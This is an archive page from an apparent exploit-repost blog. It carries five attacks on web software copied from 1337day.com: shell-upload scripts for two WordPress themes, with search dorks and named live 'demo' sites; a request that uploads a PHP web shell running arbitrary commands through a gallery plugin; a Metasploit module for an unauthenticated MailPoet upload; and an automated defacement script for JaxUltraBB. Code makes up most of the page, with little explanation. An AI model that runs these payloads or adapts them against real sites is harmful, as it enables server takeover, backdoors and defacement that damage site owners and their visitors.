Home » Archives for 08/30/14

Sabtu, 30 Agustus 2014

Wordpress Theme Echea Shell Upload Vulnerability





############################################################################
# Title : Wordpress Theme Echea Shell Upload Vulnerability   
# Author : Aloulou                                             
# Date : 15/05/2014                                                    
# Facebook : http://www.facebook.com/Aloulou.TN                               
# Email: aloulou@alquds.com
# Vendor : www.themeforest.net                                                     
# Google Dork : inurl:/wp-content/themes/echea/
# Tested on : Linux
                        
############################################################################
Exploit:
<?php
$uploadfile="shell.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
ShellAccess:
    http://127.0.0.1/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg
Demo:http://yanaselandscaping.com
# Greeting to : Tunisia ,  CyberPink , Brikovich , Anonboy
############################################################################
# 120773CDEC4B3C62   1337day.com [2014-08-31]   BF54DAAA2B06D615 #
20.27  Unknown  No comments
Read More

Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability



############################################################################
# Title : Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability   
# Author : Aloulou                                             
# Date : 13/05/2014                                                    
# Facebook : http://www.facebook.com/Aloulou.TN                               
# Email: aloulou@alquds.com
# Vendor : www.photocrati.com                                                       
# Google Dork inurl:/wp-content/themes/photocrati-theme-v4.07/
# Tested on : Linux                       
############################################################################
Exploit:
<?php
   
$uploadfile="shell.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",'folder'=>'/admin/scripts/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
  print "$postResult";
?>
ShellAccess:
    http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/shell.php
Demo:http://www.tanguygilson.com
# Greeting to : Tunisia ,  CyberPink , Brikovich , Anonboy
############################################################################
# 2935E278AA2F72DF   1337day.com [2014-08-31]   0E88B39FD8DD85B4 #
20.26  Unknown  No comments
Read More

Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability



######################
# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.codeasily.com/
# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip
# Date : 2014-08-01
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description : 
Any user could upload php files (administrator by default).
######################
# Vulnerability Disclosure Timeline:
2014-08-01:  Discovered vulnerability
2014-08-01:  Vendor Notification (Twitter)
2014-08-01:  Vendor Response/Feedback
2014-08-02:  Vendor Fix/Patch
2014-08-02:  Public Disclosure
######################
# PoC:
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia
Content-Length=916
Content-Type=multipart/form-data; boundary=---------------------------304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------304431219031197
Content-Disposition: form-data; name="name"
.shell.php
-----------------------------304431219031197
Content-Disposition: form-data; name="chunk"
0
-----------------------------304431219031197
Content-Disposition: form-data; name="chunks"
1
-----------------------------304431219031197
Content-Disposition: form-data; name="params"
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=
-----------------------------304431219031197
Content-Disposition: form-data; name="file"; filename=".shell.php"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>
-----------------------------304431219031197--
Backdoor location:
http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd
#####################
Discovered By : Claudio Viviani
                http://www.homelab.it
                info@homelab.it
                homelabit@protonmail.ch
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
#####################
# 9147218032EF84B6   1337day.com [2014-08-31]   BA7F519AECC09377 #
20.24  Unknown  No comments
Read More

Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload



Deskripsi:
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7 is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme functionality to upload a zip file containing the payload. The plugin used the admin_init hook without knowning the hook is also executed for unauthenticated users when calling the right URL.
Usage info:
msf > use exploit/unix/webapp/wp_wysija_newsletters_upload msf exploit(wp_wysija_newsletters_upload) > show targets ...targets... msf exploit(wp_wysija_newsletters_upload) > set TARGET <target-id> msf exploit(wp_wysija_newsletters_upload) > show options ...show and set options... msf exploit(wp_wysija_newsletters_upload) > exploit 
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload',
      'Description' => %q{
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme
functionality to upload a zip file containing the payload. The plugin used the
admin_init hook without knowning the hook is also executed for unauthenticated
users when calling the right URL.
},
      'Author' =>
        [
          'Marc-Alexandre Montpas', # initial discovery
          'Christian Mehlmauer' # metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ]
        ],
      'Privileged' => false,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' => [ ['wysija-newsletters < 2.6.7', {}] ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jul 1 2014'))
  end

  def create_zip_file(theme_name, payload_name)
    # the zip file must match the following:
    # -) Exactly one folder representing the theme name
    # -) A style.css in the theme folder
    # -) Additional files in the folder

    content = {
      File.join(theme_name, 'style.css') => '',
      File.join(theme_name, payload_name) => payload.encoded
    }

    zip_file = Rex::Zip::Archive.new
    content.each_pair do |name, content|
      zip_file.add_file(name, content)
    end

    zip_file.pack
  end

  def check
    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
    res = send_request_cgi({
      'uri' => readme_url,
      'method' => 'GET'
    })
    # no readme.txt present
    if res.nil? || res.code != 200
      return Msf::Exploit::CheckCode::Unknown
    end

    # try to extract version from readme
    # Example line:
    # Stable tag: 2.6.6
    version = res.body[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]

    # readme present, but no version number
    if version.nil?
      return Msf::Exploit::CheckCode::Detected
    end

    print_status("#{peer} - Found version #{version} of the plugin")

    if Gem::Version.new(version) < Gem::Version.new('2.6.7')
      return Msf::Exploit::CheckCode::Appears
    else
      return Msf::Exploit::CheckCode::Safe
    end
  end

  def exploit
    theme_name = rand_text_alpha(10)
    payload_name = "#{rand_text_alpha(10)}.php"

    zip_content = create_zip_file(theme_name, payload_name)

    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php')

    data = Rex::MIME::Message.new
    data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
    data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
    data.add_part('themeupload', nil, nil, 'form-data; name="action"')
    data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
    post_data = data.to_s

    payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)

    print_status("#{peer} - Uploading payload to #{payload_uri}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
      'data' => post_data
    })

    if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Files to cleanup (session is dropped in the created folder):
    # style.css
    # the payload
    # the theme folder (manual cleanup)
    register_files_for_cleanup('style.css', payload_name)

    print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")

    print_status("#{peer} - Executing payload #{payload_uri}")
    res = send_request_cgi({
      'uri' => payload_uri,
      'method' => 'GET'
    })
  end
end

# A4C4444BF14CF8A2   1337day.com [2014-08-31]   C016BBFB9FACA1FB #
20.23  Unknown  No comments
Read More

JaxUltraBB <= 2.0 (delete.php) Remote Auto Deface Exploit


=========================================================
JaxUltraBB <= 2.0 (delete.php) Remote Auto Deface Exploit
=========================================================
#!/usr/bin/php -q -d short_open_tag=on
<?
print '
:::::::::  :::::::::: :::     ::: ::::::::::: :::       
:+:    :+: :+:        :+:     :+:     :+:     :+:       
+:+    +:+ +:+        +:+     +:+     +:+     +:+       
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+       
+#+    +#+ +#+         +#+   +#+      +#+     +#+       
#+#    #+# #+#          #+#+#+#       #+#     #+#       
#########  ##########     ###     ########### ##########
::::::::::: ::::::::::     :::     ::::    :::: 
    :+:     :+:          :+: :+:   +:+:+: :+:+:+
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+
    +#+     +#+        +#+     +#+ +#+       +#+
    #+#     #+#        #+#     #+# #+#       #+#
    ###     ########## ###     ### ###       ###
         
   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
  
JaxUltraBB <= 2.0 (delete.php) Defaced Exploit
[Script name: JaxUltraBB 2.0
Find by: Kacper
or
http://www.rahim.webd.pl/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko., CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios,
mIvus, nukedclx, SkD, wacky
';
if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      JaxUltraBB path
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /JaxUltraBB/
php '.$argv[0].' 2.2.2.2 /JaxUltraBB/ -P1.1.1.1:80
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
        $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
        }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$hauru='<STYLE =text/css>BODY {
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: darkgray; SCROLLBAR-3DLIGHT-COLOR: #eeeeee; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: gray; SCROLLBAR-DARKSHADOW-COLOR: #000000
}
A:link {
COLOR: darkblue; TEXT-DECORATION: none
}
A:visited {
COLOR: #000088; TEXT-DECORATION: none
}
A:hover {
COLOR: #000000
}
body, td, th {
color: #000000;
}
table, p, td, tr
{
visibility:hidden;
}
body {
background-color: #000000;
background-image: url("http://img89.imageshack.us/img89/5125/hackpo6.jpg");
}
</STYLE>
<script language="JavaScript">
var left="{";
var right="}";
var msg="  - - Hacked By DEVIL TEAM .:We Ownz You!:. - -  ";
var speed=200;
function scroll_title() {
document.title=left+msg+right;
msg=msg.substring(1,msg.length)+msg.charAt(0);
setTimeout("scroll_title()",speed);
}
scroll_title();
</script>';
$packet ="GET ".$p."delete.php?modtype=%3Cimg%20src=img/admin.jpg%3E&forum=../index.php&contents=".$hauru." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "Site defaced ;] look to index.php";
?>
# 41AD7EE8411FC356   1337day.com [2014-08-31]   1DF4D0078BACFFFC #
20.18  Unknown  No comments
Read More

Postingan Lebih Baru Postingan Lama Beranda